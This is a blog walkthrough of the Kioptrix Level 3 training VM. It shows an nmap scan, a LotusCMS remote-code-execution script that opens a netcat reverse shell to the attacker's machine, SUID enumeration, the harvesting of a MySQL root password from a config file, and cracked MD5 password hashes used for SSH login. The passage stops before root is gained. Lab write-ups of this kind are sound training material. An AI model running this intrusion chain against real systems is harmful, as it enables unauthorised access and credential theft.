The Evil Bit Blog: Kioptrix Level 3

It's definitely getting more difficult. Let's see. The NMAP scan showed the following:

root@kali:~# nmap -sS -A 192.168.1.20

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 22:04 CET
Nmap scan report for 192.168.1.20
Host is up (0.00062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:17:F3:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 192.168.1.20

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

I went to the website, and after some navigation I found that it's running Lotus CMS web application.

I found two exploits on exploit-db, one of them was for Metasploit, which I didn't wanted to use (although I tried the exploit and it worked), and the other didn't work. I found another one, which is a bash script of the Metasploit version:

https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh

It worked really nice, and I got a reverse shell:

About to try and inject reverse shell....
what IP to use?
192.168.1.17
What PORT?
4444

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

---------------------------

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.20] 59701
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
pwd
/home/www/kioptrix3.com

I tried quite a few local privilege escalation exploits but neither of them worked.

I did some further enumeration and found that there is an interesting file which has the suid bit set (/usr/local/bin/ht).

$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su

However I couldn't run it from here, cause I didn't have full terminal access. I need SSH! Argh...

I moved on to do some further enumeration. In the passwd file I found 2 other normal users (beside root):

root:x:0:0:root:/root:/bin/bash
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

I looked on the webapp configs hoping I will find a password for the MySQL database on the system. I found it in the gconfig.php file:

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
        die();
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    }else {
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }

    }
}

?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$

I logged in to the database and after browsing the tables, I found passwords for the two users on the machine.

After doing a Google search I found the password for the MD5 hashes:

md5(Mast3r) = 0d3eccfb887aabd50f243b3f155c0f85
md5(starwars) = 5badcaf789d3d1d09794d8f021f40f0e

It turned out that both passwords were working on SSH as well. The better account was "loneferret". After login I found that it can run "ht" editor with root privileges.